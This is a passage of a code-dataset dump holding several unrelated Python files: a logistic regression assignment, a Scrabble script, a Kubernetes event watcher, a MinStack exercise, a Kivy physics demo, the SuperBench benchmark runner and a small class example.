self.training_iteration += 1\r\n\r\n def fit(self):\r\n \"\"\"\r\n Performs Batch Gradient Descent\r\n \"\"\"\r\n self.init_plot(self.FEATURES)\r\n\r\n # YOUR CODE HERE\r\n\r\n while not self.converged() or self.training_iteration == 0:\r\n print('Iteration: ', self.training_iteration)\r\n\r\n self.compute_gradient_for_all()\r\n self.upd_theta()\r\n self.update_plot(np.sum(np.square(self.gradient)))\r\n\r\n self.training_iteration += 1\r\n\r\n def upd_theta(self):\r\n for k in range(self.FEATURES):\r\n self.upd_feat_theta(k)\r\n\r\n def upd_feat_theta(self, feature):\r\n\r\n self.theta[feature] -= self.LEARNING_RATE * self.gradient[feature]\r\n\r\n def converged(self):\r\n # Convergence = the gradient is close to the zero vector = the\r\n # sum of squares of the gradient[k] is smaller than CONVERGENCE_MARGIN\r\n\r\n sum_of_squares = np.sum(np.square(self.gradient))\r\n print('sum_of_squares: ', sum_of_squares)\r\n\r\n if sum_of_squares < self.CONVERGENCE_MARGIN:\r\n return True\r\n return False\r\n\r\n\r\n def classify_datapoints(self, test_data, test_labels):\r\n \"\"\"\r\n Classifies datapoints\r\n \"\"\"\r\n print('Model parameters:');\r\n\r\n print(' '.join('{:d}: {:.4f}'.format(k, self.theta[k]) for k in 
range(self.FEATURES)))\r\n\r\n self.DATAPOINTS = len(test_data)\r\n\r\n self.x = np.concatenate((np.ones((self.DATAPOINTS, 1)), np.array(test_data)), axis=1)\r\n self.y = np.array(test_labels)\r\n confusion = np.zeros((self.FEATURES, self.FEATURES))\r\n\r\n for d in range(self.DATAPOINTS):\r\n prob = self.conditional_prob(1, d)\r\n predicted = 1 if prob > .5 else 0\r\n confusion[predicted][self.y[d]] += 1\r\n\r\n accuracy = (confusion[0][0] + confusion[1][1]) / np.sum(confusion)\r\n\r\n # precision = TP /(TP + FP)\r\n precision1 = confusion[1][1] / (confusion[1][1] + confusion[1][0])\r\n precision0 = confusion[0][0] / (confusion[0][0] + confusion[0][1])\r\n\r\n # recall = TP / (TP + FN)\r\n recall1 = confusion[1][1] / (confusion[1][1] + confusion[0][1])\r\n recall0 = confusion[0][0] / (confusion[0][0] + confusion[1][0])\r\n\r\n print('Accuracy = ', accuracy)\r\n print('precision 1 = ', precision1)\r\n print('precision 0 = ', precision0)\r\n print('recall 1 = ', recall1)\r\n print('recall 0 = ', recall0)\r\n\r\n print(' Real class')\r\n print(' ', end='')\r\n print(' '.join('{:>8d}'.format(i) for i in range(2)))\r\n for i in range(2):\r\n if i == 0:\r\n print('Predicted class: {:2d} '.format(i), end='')\r\n else:\r\n print(' {:2d} '.format(i), end='')\r\n print(' '.join('{:>8.3f}'.format(confusion[i][j]) for j in range(2)))\r\n\r\n\r\n def print_result(self):\r\n print(' '.join(['{:.2f}'.format(x) for x in self.theta]))\r\n print(' '.join(['{:.2f}'.format(x) for x in self.gradient]))\r\n\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n def update_plot(self, *args):\r\n \"\"\"\r\n Handles the plotting\r\n \"\"\"\r\n if self.i == []:\r\n self.i = [0]\r\n else:\r\n self.i.append(self.i[-1] + 1)\r\n\r\n for index, val in enumerate(args):\r\n self.val[index].append(val)\r\n self.lines[index].set_xdata(self.i)\r\n self.lines[index].set_ydata(self.val[index])\r\n\r\n self.axes.set_xlim(0, max(self.i) * 1.5)\r\n self.axes.set_ylim(0, max(max(self.val)) * 1.5)\r\n\r\n plt.draw()\r\n plt.pause(1e-20)\r\n\r\n\r\n def init_plot(self, num_axes):\r\n \"\"\"\r\n num_axes is the number of variables that should be plotted.\r\n \"\"\"\r\n self.i = []\r\n self.val = []\r\n plt.ion()\r\n self.axes = plt.gca()\r\n self.lines =[]\r\n\r\n for i in range(num_axes):\r\n self.val.append([])\r\n self.lines.append([])\r\n self.lines[i], = self.axes.plot([], self.val[0], '-', c=[random.random() for _ in range(3)], linewidth=1.5, markersize=4)\r\n\r\n # ----------------------------------------------------------------------\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n Tests the code on a toy example.\r\n \"\"\"\r\n x = [\r\n [ 1,1 ], [ 0,0 ], [ 1,0 ], [ 0,0 ], [ 0,0 ], [ 0,0 ],\r\n [ 0,0 ], [ 0,0 ], [ 1,1 ], [ 0,0 ], [ 0,0 ], [ 1,0 ],\r\n [ 1,0 ], [ 0,0 ], [ 1,1 ], [ 0,0 ], [ 1,0 ], [ 0,0 ]\r\n ]\r\n\r\n # Encoding of the correct classes for the training material\r\n y = [1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0]\r\n b = BinaryLogisticRegression(x, y)\r\n b.fit()\r\n b.print_result()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Assignment 2/a02/NER/BinaryLogisticRegression.py","file_name":"BinaryLogisticRegression.py","file_ext":"py","file_size_in_byte":10702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"533159608","text":"from scrabble import Scrabble\n\ns = Scrabble(players=3)\n\nfirst = s.who_goes_first()\n\ns.pick_first_tiles()\n\ncoords = [\n (0, 0),\n (0, 1),\n (0, 2),\n]\n\nword = 
list()\n\nword = 'ZOO'\n\ns.add_word(s.player_turn_queue,'test', word, coords)\n # CAT\n # { player: [1], word: { C: (7, 7), A: (7, 8), T: (7, 9) }\n\ns.get_tiles(player=1)\ntest = s.scoreboard.get_word_score(player=1, turn=1)\n\n\nstop = None","sub_path":"scrabble/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"561691098","text":"import json\nimport logging\nimport requests\nfrom kubernetes import watch\nfrom deepdiff import DeepDiff # For Deep Difference of 2 objects\nfrom .custom_object import CustomObjectManager\nfrom .namespaced_configmap import NamespacedConfigMapManager\nfrom .utility import UtilityManager\n\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nclass EventManager:\n\n def __init__(self, config, services):\n self.services = services\n self.config = config\n self.util = UtilityManager()\n self.co_manager = CustomObjectManager()\n self.cm_manager = NamespacedConfigMapManager()\n\n def is_deleted_event(self, event):\n return event[\"type\"] == \"DELETED\"\n\n def is_added_event(self, event):\n return event[\"type\"] == \"ADDED\"\n\n def is_modified_event(self, event):\n return event[\"type\"] == \"MODIFIED\"\n\n def is_ignored_event(self, event):\n\n configmap_details = self.cm_manager.read_namespaced_config_map(event[\"object\"][\"metadata\"]['namespace'], event[\"object\"][\"metadata\"]['name'])\n old_event_detail = json.loads(configmap_details.data[\"event\"])\n\n deep_diff_result = DeepDiff(\n self.util.get_attr(event['object'], \"spec\", {}),\n self.util.get_attr(old_event_detail[\"object\"], \"spec\", {}),\n ignore_order=True,\n report_repetition=True)\n\n # update configmap\n self.cm_manager.replace_namespaced_config_map(\n event[\"object\"][\"metadata\"][\"namespace\"],\n event[\"object\"][\"metadata\"][\"name\"],\n { \"event\": json.dumps(event) }\n )\n\n if {} == deep_diff_result:\n return True\n\n return False\n\n\n def watch_cluster_custom_object(self):\n\n stream = watch.Watch().stream(\n self.co_manager.coApi.list_cluster_custom_object,\n self.config[\"group\"],\n self.config[\"version\"],\n self.config[\"plural\"],\n watch=True\n )\n\n for event in stream:\n self.event_handler(event)\n\n def event_handler(self, event):\n # TODO:\n # - Async call\n if event[\"object\"][\"kind\"].lower() in self.config[\"plural\"]:\n\n # Ignore delete event\n if self.is_deleted_event(event):\n if not self.cm_manager.exist_namespaced_config_map(event[\"object\"][\"metadata\"][\"namespace\"], event[\"object\"][\"metadata\"][\"name\"]):\n return True\n\n return self.cm_manager.delete_namespaced_config_map(\n event[\"object\"][\"metadata\"][\"namespace\"],\n event[\"object\"][\"metadata\"][\"name\"]\n )\n\n if self.is_added_event(event):\n if self.cm_manager.exist_namespaced_config_map(event[\"object\"][\"metadata\"][\"namespace\"], event[\"object\"][\"metadata\"][\"name\"]):\n return True\n\n self.cm_manager.create_namespaced_config_map(\n event[\"object\"][\"metadata\"][\"namespace\"],\n event[\"object\"][\"metadata\"][\"name\"],\n {\n \"event\": json.dumps(event)\n }\n )\n\n if self.is_modified_event(event):\n if not self.cm_manager.exist_namespaced_config_map(event[\"object\"][\"metadata\"][\"namespace\"], event[\"object\"][\"metadata\"][\"name\"]):\n return False\n\n # Ignore status | outputs update event\n if self.is_ignored_event(event):\n return True\n\n logger.info(\"=========send event========= %s\", 
self.services[event[\"object\"][\"spec\"][\"type\"]])\n logger.info(event)\n res = requests.post(\"http://\" + self.services[event[\"object\"][\"spec\"][\"type\"]], headers = {'Content-type': 'application/json'}, data=json.dumps(event))\n logger.info(res)\n logger.info(\"================== end\")\n","sub_path":"src/kube/event_manager.py","file_name":"event_manager.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"258068120","text":"class MinStack(object):\n\n def __init__(self):\n \"\"\"\n initialize your data structure here.\n \"\"\"\n self.s = []\n self.min = None\n def push(self, x):\n \"\"\"\n :type x: int\n :rtype: void\n \"\"\"\n \n if len(self.s) == 0:\n self.min = x\n elif x < self.min:\n self.min = x\n self.s.append(x)\n \n def pop(self):\n \"\"\"\n :rtype: void\n \"\"\"\n \n top = self.s.pop()\n if top==self.getMin():\n temp = []\n self.min = self.top()\n while(len(self.s)!=0):\n self.min = min(self.min,self.top())\n temp.append(self.s.pop())\n while(len(temp)!=0):\n self.s.append(temp.pop())\n \n def top(self):\n \"\"\"\n :rtype: int\n \"\"\"\n if len(self.s)==0:\n return None\n else:\n return self.s[-1]\n \n\n def getMin(self):\n \"\"\"\n :rtype: int\n \"\"\"\n return self.min\n \n\n\n# Your MinStack object will be instantiated and called as such:\n# obj = MinStack()\n# obj.push(x)\n# obj.pop()\n# param_3 = obj.top()\n# param_4 = obj.getMin()","sub_path":"155. Min Stack/155. Min Stack.py","file_name":"155. Min Stack.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90876477","text":"import cymunk as cy\nfrom os.path import dirname, join\nfrom kivy.clock import Clock\nfrom kivy.app import App\nfrom kivy.graphics import Color, Rectangle\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import DictProperty, ListProperty\nfrom kivy.core.image import Image\nfrom random import random\nfrom kivy.lang import Builder\n\nBuilder.load_string('''\n:\n Label:\n text: 'circles: %d' % len(root.blist)\n''')\n\nclass Playground(Widget):\n\n cbounds = ListProperty([])\n cmap = DictProperty({})\n blist = ListProperty([])\n\n def __init__(self, **kwargs):\n self._hue = 0\n super(Playground, self).__init__(**kwargs)\n self.init_physics()\n self.bind(size=self.update_bounds, pos=self.update_bounds)\n self.texture = Image(join(dirname(__file__), 'circle.png'), mipmap=True).texture\n Clock.schedule_interval(self.step, 1 / 30.)\n\n def init_physics(self):\n # create the space for physics simulation\n self.space = space = cy.Space()\n space.iterations = 30\n space.gravity = (0, -700)\n space.sleep_time_threshold = 0.5\n space.collision_slop = 0.5\n\n # create 4 segments that will act as a bounds\n for x in xrange(4):\n seg = cy.Segment(space.static_body,\n cy.Vec2d(0, 0), cy.Vec2d(0, 0), 0)\n seg.elasticity = 0.6\n #seg.friction = 1.0\n self.cbounds.append(seg)\n space.add_static(seg)\n\n # update bounds with good positions\n self.update_bounds()\n\n def update_bounds(self, *largs):\n assert(len(self.cbounds) == 4)\n a, b, c, d = self.cbounds\n x0, y0 = self.pos\n x1 = self.right\n y1 = self.top\n\n self.space.remove_static(a)\n self.space.remove_static(b)\n self.space.remove_static(c)\n self.space.remove_static(d)\n a.a = (x0, y0)\n a.b = (x1, y0)\n b.a = (x1, y0)\n b.b = (x1, y1)\n c.a = (x1, y1)\n c.b = (x0, y1)\n d.a = (x0, y1)\n d.b = (x0, y0)\n self.space.add_static(a)\n 
self.space.add_static(b)\n self.space.add_static(c)\n self.space.add_static(d)\n\n def step(self, dt):\n self.space.step(1 / 30.)\n self.update_objects()\n\n def update_objects(self):\n for body, obj in self.cmap.iteritems():\n p = body.position\n radius, color, rect = obj\n rect.pos = p.x - radius, p.y - radius\n rect.size = radius * 2, radius * 2\n\n def add_random_circle(self):\n self.add_circle(\n self.x + random() * self.width,\n self.y + random() * self.height,\n 10 + random() * 50)\n\n def add_circle(self, x, y, radius):\n # create a falling circle\n body = cy.Body(100, 1e9)\n body.position = x, y\n circle = cy.Circle(body, radius)\n circle.elasticity = 0.6\n #circle.friction = 1.0\n self.space.add(body, circle)\n\n with self.canvas.before:\n self._hue = (self._hue + 0.01) % 1\n color = Color(self._hue, 1, 1, mode='hsv')\n rect = Rectangle(\n texture=self.texture,\n pos=(self.x - radius, self.y - radius),\n size=(radius * 2, radius * 2))\n self.cmap[body] = (radius, color, rect)\n\n # remove the oldest one\n self.blist.append((body, circle))\n if len(self.blist) > 200:\n body, circle = self.blist.pop(0)\n self.space.remove(body)\n self.space.remove(circle)\n radius, color, rect = self.cmap.pop(body)\n self.canvas.before.remove(color)\n self.canvas.before.remove(rect)\n\n def on_touch_down(self, touch):\n self.add_circle(touch.x, touch.y, 10 + random() * 20)\n\n def on_touch_move(self, touch):\n self.add_circle(touch.x, touch.y, 10 + random() * 20)\n\nclass PhysicsApp(App):\n def build(self):\n return Playground()\n\nif __name__ == '__main__':\n PhysicsApp().run()\n","sub_path":"KivyProject/cymunkdemo/examples/circle_box/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"351904406","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom django.contrib.auth.models import *\nfrom subscriptions.models import *\nfrom rest_framework.exceptions import APIException\nimport datetime\n\n\nclass SubscriptionTypeSerializer(ModelSerializer):\n\n class Meta:\n model = SubscriptionType\n fields= \"__all__\"\n\nclass SubscriptionSerializer(ModelSerializer):\n class Meta:\n model = Subscription\n # fields= \"__all__\"\n fields = ['id', 'app_master', 'subscription_type', 'offer_code', 'price_master', 'total_cost']\n\nclass SubscriptionCreateSerializer(ModelSerializer):\n app_master = serializers.IntegerField(required=False)\n subscription_type = serializers.IntegerField(required=False)\n offer_code = serializers.IntegerField(required=False)\n price_master = serializers.IntegerField(required=False)\n valid_until = serializers.DateTimeField(required=False)\n total_cost = serializers.DecimalField(required=False, decimal_places=2,max_digits=10)\n class Meta:\n model = Subscription\n fields= ['id','app_master','subscription_type','offer_code','price_master','total_cost','valid_until']\n\n def create(self, validated_data):\n\n try:\n get_subscription_type = list(\n SubscriptionType.objects.values('days').filter(pk=validated_data.get('subscription_type')))\n day_duration = get_subscription_type[0]['days']\n paytm = True\n valid_until = datetime.datetime.now() + datetime.timedelta(days=day_duration)\n print('valid_until:',valid_until)\n create_subscription = Subscription.objects.create(valid_until=valid_until,\n app_master_id =validated_data.get('app_master'),\n subscription_type_id =validated_data.get('subscription_type'),\n 
offer_code_id =validated_data.get('offer_code'),\n price_master_id =validated_data.get('price_master'),\n total_cost =validated_data.get('total_cost'))\n print('create_subscription::', create_subscription)\n\n\n return {\n 'id':create_subscription.id,\n 'app_master':create_subscription.app_master.id,\n 'subscription_type':create_subscription.subscription_type.id,\n 'offer_code':create_subscription.offer_code.id if create_subscription.offer_code else 0 ,\n 'price_master':create_subscription.price_master.id,\n 'total_cost':create_subscription.total_cost,\n 'valid_until':create_subscription.valid_until\n }\n except Exception as e:\n raise APIException({\n 'msg': e,\n 'success': 0\n })","sub_path":"subscriptions/z_serializers.py","file_name":"z_serializers.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"489102637","text":"from collections import defaultdict\nimport pyautogui\nimport time\n\nclass Tagent:\n\t#qvalues: input is block, dict: input is (mask + action)\n\tqvalues = [defaultdict(int), defaultdict(int), defaultdict(int), defaultdict(int), defaultdict(int), defaultdict(int), defaultdict(int)]\n\talpha = 0\n\tgamma = 0\n\n\tdef __init__(self, learningrate = 0.5, discount = 0.5):\n\t\tself.alpha = learningrate\n\t\tself.gamma = discount\n\t\tprint(learningrate,discount)\n\t\n\tdef sendmask(self, state, width):\n\t\tmask = []\n\t\tfor i in range(10 - width + 1):\n\t\t\tcon = \"\"\n\t\t\tfor j in range(width - 1):\n\t\t\t\t#print(i+j)\n\t\t\t\tcon = con + str(state[i+j]) + \",\"\n\t\t\tmask.append(con)\n\t\treturn mask\n\t\n\tdef maxaction(self, state, block):\n\t\ttable = self.qvalues[block]\n\t\tbestaction = -1\n\t\tbestmask = -1\n\t\tbesti = -1\n\t\tbestq = -999\n\t\t\n\t\tmask2 = self.sendmask(state, 2)\n\t\tmask3 = self.sendmask(state, 3)\n\t\tmask4 = self.sendmask(state, 4)\n\t\t\n\t\tif block == 0:\n\t\t\t#(no flip) mask4: N\n\t\t\tfor i in range(len(mask4)):\n\t\t\t\tif bestq < table[mask4[i] + \"0\"]:\n\t\t\t\t\tbestaction = 0\n\t\t\t\t\tbestmask = 4\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask4[i] + \"0\"]\n\t\t\t#(1 flip) mask2: L, N\n\t\t\tfor j in range(2):\n\t\t\t\tfor i in range(len(mask2)):\n\t\t\t\t\tif bestq < table[mask2[i] + str(j)]:\n\t\t\t\t\t\tbestaction = j\n\t\t\t\t\t\tbestmask = 2\n\t\t\t\t\t\tbesti = i\n\t\t\t\t\t\tbestq = table[mask2[i] + str(j)]\n\t\t\t\t\t\t\n\t\telif block == 1:\n\t\t\n\t\t\t#(no flip) mask2: N\n\t\t\tfor i in range(len(mask2)):\n\t\t\t\tif bestq < table[mask2[i] + \"0\"]:\n\t\t\t\t\tbestaction = 0\n\t\t\t\t\tbestmask = 2\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask2[i] + \"0\"]\n\n\t\telif block == 3 or block == 4:\n\t\t\n\t\t\t#(no flip) mask3: N\n\t\t\tfor i in range(len(mask3)):\n\t\t\t\tif bestq < table[mask3[i] + \"0\"]:\n\t\t\t\t\tbestaction = 0\n\t\t\t\t\tbestmask = 3\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask3[i] + \"0\"]\n\t\t\t\n\t\t\t#(flip) mask2: N\n\t\t\tfor i in range(len(mask2)):\n\t\t\t\tif bestq < table[mask2[i] + \"1\"]:\n\t\t\t\t\t#print(i)\n\t\t\t\t\tbestaction = 1\n\t\t\t\t\tbestmask = 2\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask2[i] + \"1\"]\n\t\t\t\t\t\n\t\telse:\n\t\t#make more compact, combine for loops\n\t\t\t#(no flip) mask3: N\n\t\t\tfor i in range(len(mask3)):\n\t\t\t\tif bestq < table[mask3[i] + \"0\"]:\n\t\t\t\t\tbestaction = 0\n\t\t\t\t\tbestmask = 3\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask3[i] + \"0\"]\n\t\t\t\t\n\t\t\t#(flip) mask2: N\n\t\t\tfor i in 
range(len(mask2)):\n\t\t\t\tif bestq < table[mask2[i] + \"1\"]:\n\t\t\t\t\tbestaction = 1\n\t\t\t\t\tbestmask = 2\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask2[i] + \"1\"]\n\t\t\t\n\t\t\t#(flip/flip) mask3: N\n\t\t\tfor i in range(len(mask3)):\n\t\t\t\tif bestq < table[mask3[i] + \"2\"]:\n\t\t\t\t\tbestaction = 2\n\t\t\t\t\tbestmask = 3\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask3[i] + \"2\"]\n\t\t\t\t\t\n\t\t\t#(flip/flip/flip/right) mask2: N\n\t\t\tfor i in range(len(mask2)):\n\t\t\t\tif bestq < table[mask2[i] + \"3\"]:\n\t\t\t\t\tbestaction = 3\n\t\t\t\t\tbestmask = 2\n\t\t\t\t\tbesti = i\n\t\t\t\t\tbestq = table[mask2[i] + \"3\"]\n\t\t\n\t\tif bestmask == 2:\n\t\t\treturn bestaction, mask2, bestmask, besti\n\t\telif bestmask == 3:\n\t\t\treturn bestaction, mask3, bestmask, besti\n\t\telse:\n\t\t\treturn bestaction, mask4, bestmask, besti\n\t\n\t\n\t#greedy policy\n\tdef takeaction(self, state, block):\n\t\tnextaction, mask, bestwidth, besti = self.maxaction(state, block)\n\t\t\n\t\t#take catered action\n\t\tself.inputcommand(block, nextaction, bestwidth, besti)\n\t\tpyautogui.press('space')\n\t\t\n\t\treturn nextaction, mask, besti\n\t\n\tdef inputcommand(self, block, action, width, i):\n\t\n\t\t#calculate shift blocks need to move\n\t\tshift = i - 3\n\t\tif width == 2:\n\t\t\tshift = shift - 1\n\t\n\t\t#flip blocks based on action\n\t\tif block != 0:\n\t\t\tfor i in range(action):\n\t\t\t\tpyautogui.press('up')\n\t\t\t\tif i == 2:\n\t\t\t\t\tpyautogui.press('right')\n\t\t\n\t\t#special case for block 0\n\t\tif block == 0 and action != 0:\n\t\t\tpyautogui.press('up')\n\t\t\tif action == 1:\n\t\t\t\tpyautogui.press('left')\n\t\t\t\t\n\t\t\t\t\n\t\t#print(shift,width,i)\n\t\t#translate based on shift\n\t\tfor i in range(abs(shift)):\n\t\t\tif shift < 0:\n\t\t\t\tpyautogui.press('left')\n\t\t\telse:\n\t\t\t\tpyautogui.press('right')\n\t\t\n\t#updates q-value table\n\tdef updateq(self, state, mask, besti, block, action, reward, nextstate, nextblock):\n\t\ttable = self.qvalues[block]\n\t\tcurq = table[mask[besti] + str(action)]\n\t\tnextaction, nextmask, masknum, nexti = self.maxaction(nextstate,nextblock)\n\t\tcurnextq = table[nextmask[nexti] + str(nextaction)]\n\t\tnewq = curq + self.alpha * (reward + (self.gamma * curnextq) - curq)\n\t\ttable[mask[besti] + str(action)] = newq\n\t\treturn curq, newq\n\t\t\n\t#if agent failed, will attempt to reset board\n\tdef resetboard(self):\n\t\tgame = True\n\t\twhile game:\n\t\t\ttry:\n\t\t\t\tpyautogui.locateOnScreen('temp/gameover.png')\n\t\t\t\tprint(\"found gameover screen\")\n\t\t\t\tpyautogui.press('space')\n\t\t\t\tgame = False\n\t\t\texcept Exception:\n\t\t\t\tpyautogui.press('space')\n\t\t\t\t#time.sleep(0.01)\n","sub_path":"Webdatabase/tagent.py","file_name":"tagent.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"1320047","text":"# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\n\"\"\"SuperBench Runner.\"\"\"\n\nimport random\nfrom pathlib import Path\n\nfrom joblib import Parallel, delayed\nfrom omegaconf import ListConfig, OmegaConf\n\nfrom superbench.common.utils import SuperBenchLogger, logger\nfrom superbench.runner.ansible import AnsibleClient\n\n\nclass SuperBenchRunner():\n \"\"\"SuperBench runner class.\"\"\"\n def __init__(self, sb_config, docker_config, ansible_config, sb_output_dir):\n \"\"\"Initialize.\n\n Args:\n sb_config (DictConfig): SuperBench config object.\n docker_config 
(DictConfig): Docker config object.\n ansible_config (DictConfig): Ansible config object.\n sb_output_dir (str): SuperBench output directory.\n \"\"\"\n self._sb_config = sb_config\n self._docker_config = docker_config\n self._ansible_config = ansible_config\n self._sb_output_dir = sb_output_dir\n self._output_path = Path(sb_output_dir).expanduser().resolve()\n self._ansible_client = AnsibleClient(ansible_config)\n\n self.__set_logger('sb-run.log')\n logger.info('Runner uses config: %s.', self._sb_config)\n logger.info('Runner writes to: %s.', str(self._output_path))\n\n self._sb_benchmarks = self._sb_config.superbench.benchmarks\n self.__validate_sb_config()\n self._sb_enabled_benchmarks = self.__get_enabled_benchmarks()\n logger.info('Runner will run: %s', self._sb_enabled_benchmarks)\n\n def __set_logger(self, filename):\n \"\"\"Set logger and add file handler.\n\n Args:\n filename (str): Log file name.\n \"\"\"\n SuperBenchLogger.add_handler(logger.logger, filename=str(self._output_path / filename))\n\n def __validate_sb_config(self):\n \"\"\"Validate SuperBench config object.\n\n Raise:\n InvalidConfigError: If input config is invalid.\n \"\"\"\n # TODO: add validation and defaulting\n if not self._sb_config.superbench.env:\n self._sb_config.superbench.env = {}\n for name in self._sb_benchmarks:\n if not self._sb_benchmarks[name].modes:\n self._sb_benchmarks[name].modes = []\n for idx, mode in enumerate(self._sb_benchmarks[name].modes):\n if mode.name == 'local':\n if not mode.proc_num:\n self._sb_benchmarks[name].modes[idx].proc_num = 1\n if not mode.prefix:\n self._sb_benchmarks[name].modes[idx].prefix = ''\n elif mode.name == 'torch.distributed':\n if not mode.proc_num:\n self._sb_benchmarks[name].modes[idx].proc_num = 8\n\n def __get_enabled_benchmarks(self):\n \"\"\"Get enabled benchmarks list.\n\n Return:\n list: List of benchmarks which will be executed.\n \"\"\"\n if self._sb_config.superbench.enable:\n if isinstance(self._sb_config.superbench.enable, str):\n return [self._sb_config.superbench.enable]\n elif isinstance(self._sb_config.superbench.enable, (list, ListConfig)):\n return list(self._sb_config.superbench.enable)\n return [k for k, v in self._sb_benchmarks.items() if v.enable]\n\n def __get_mode_command(self, benchmark_name, mode):\n \"\"\"Get runner command for given mode.\n\n Args:\n benchmark_name (str): Benchmark name.\n mode (DictConfig): Runner mode.\n\n Return:\n str: Runner command.\n \"\"\"\n exec_command = ('sb exec --output-dir {output_dir} -c sb.config.yaml -C superbench.enable={name}').format(\n name=benchmark_name,\n output_dir=self._sb_output_dir,\n )\n mode_command = exec_command\n if mode.name == 'local':\n mode_command = '{prefix} {command}'.format(\n prefix=mode.prefix.format(proc_rank=mode.proc_rank, proc_num=mode.proc_num),\n command=exec_command,\n )\n mode_command = f'PROC_RANK={mode.proc_rank} {mode_command.strip()}'\n elif mode.name == 'torch.distributed':\n # TODO: replace with torch.distributed.run in v1.9\n # TODO: only supports node_num=1 and node_num=all currently\n mode_command = (\n 'python3 -m torch.distributed.launch '\n '--use_env --no_python --nproc_per_node={proc_num} '\n '--nnodes={node_num} --node_rank=$NODE_RANK '\n '--master_addr=$MASTER_ADDR --master_port=$MASTER_PORT '\n '{command} {torch_distributed_suffix}'\n ).format(\n proc_num=mode.proc_num,\n node_num=1 if mode.node_num == 1 else '$NNODES',\n command=exec_command,\n torch_distributed_suffix=(\n 'superbench.benchmarks.{name}.parameters.distributed_impl=ddp '\n 
'superbench.benchmarks.{name}.parameters.distributed_backend=nccl'\n ).format(name=benchmark_name),\n )\n return mode_command.strip()\n\n def deploy(self): # pragma: no cover\n \"\"\"Deploy SuperBench environment.\"\"\"\n logger.info('Preparing SuperBench environment.')\n extravars = {\n 'ssh_port': random.randint(1 << 14, (1 << 15) - 1),\n 'output_dir': str(self._output_path),\n 'docker_image': self._docker_config.image,\n 'gpu_vendor': 'nvidia',\n }\n if bool(self._docker_config.username) and bool(self._docker_config.password):\n extravars.update(\n {\n 'docker_registry': self._docker_config.registry,\n 'docker_username': self._docker_config.username,\n 'docker_password': self._docker_config.password,\n }\n )\n self._ansible_client.run(self._ansible_client.get_playbook_config('deploy.yaml', extravars=extravars))\n\n def check_env(self): # pragma: no cover\n \"\"\"Check SuperBench environment.\"\"\"\n logger.info('Checking SuperBench environment.')\n OmegaConf.save(config=self._sb_config, f=str(self._output_path / 'sb.config.yaml'))\n self._ansible_client.run(\n self._ansible_client.get_playbook_config(\n 'check_env.yaml',\n extravars={\n 'output_dir': str(self._output_path),\n 'env': '\\n'.join(f'{k}={v}' for k, v in self._sb_config.superbench.env.items()),\n }\n )\n )\n\n def fetch_results(self): # pragma: no cover\n \"\"\"Fetch benchmark results on all nodes.\"\"\"\n try:\n (self._output_path / 'nodes').mkdir(mode=0o755, parents=True, exist_ok=True)\n except Exception:\n logger.exception('Failed to create directory %s.', str(self._output_path / 'nodes'))\n raise\n self._ansible_client.run(\n self._ansible_client.get_playbook_config(\n 'fetch_results.yaml',\n extravars={\n 'sb_output_dir': self._sb_output_dir,\n 'absolute_output_dir': str(self._output_path),\n }\n )\n )\n\n def _run_proc(self, benchmark_name, mode, vars):\n \"\"\"Run the process.\n\n Args:\n benchmark_name (str): Benchmark name.\n mode (DictConfig): Runner mode.\n vars (dict): Process variables.\n\n Returns:\n int: Process return code.\n \"\"\"\n mode.update(vars)\n logger.info('Runner is going to run %s in %s mode, proc rank %d.', benchmark_name, mode.name, mode.proc_rank)\n rc = self._ansible_client.run(\n self._ansible_client.get_shell_config(\n (\n 'docker exec sb-workspace bash -c '\n \"'set -o allexport && source sb.env && set +o allexport && {command}'\"\n ).format(command=self.__get_mode_command(benchmark_name, mode), )\n ),\n sudo=True\n )\n return rc\n\n def run(self):\n \"\"\"Run the SuperBench benchmarks distributedly.\"\"\"\n self.check_env()\n for benchmark_name in self._sb_benchmarks:\n if benchmark_name not in self._sb_enabled_benchmarks:\n continue\n benchmark_config = self._sb_benchmarks[benchmark_name]\n for mode in benchmark_config.modes:\n if mode.name == 'local':\n Parallel(n_jobs=mode.proc_num if mode.parallel else 1)(\n delayed(self._run_proc)(benchmark_name, mode, {\n 'proc_rank': proc_rank\n }) for proc_rank in range(mode.proc_num)\n )\n elif mode.name == 'torch.distributed':\n self._run_proc(benchmark_name, mode, {'proc_rank': 0})\n self.fetch_results()\n","sub_path":"superbench/runner/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"332825291","text":"__author__ = 'Debashis'\n\n\nclass Employee:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def myinfo(self):\n print(\"My Name is: \", self.name)\n\nemp = Employee(\"Deba\", 28)\ndel 
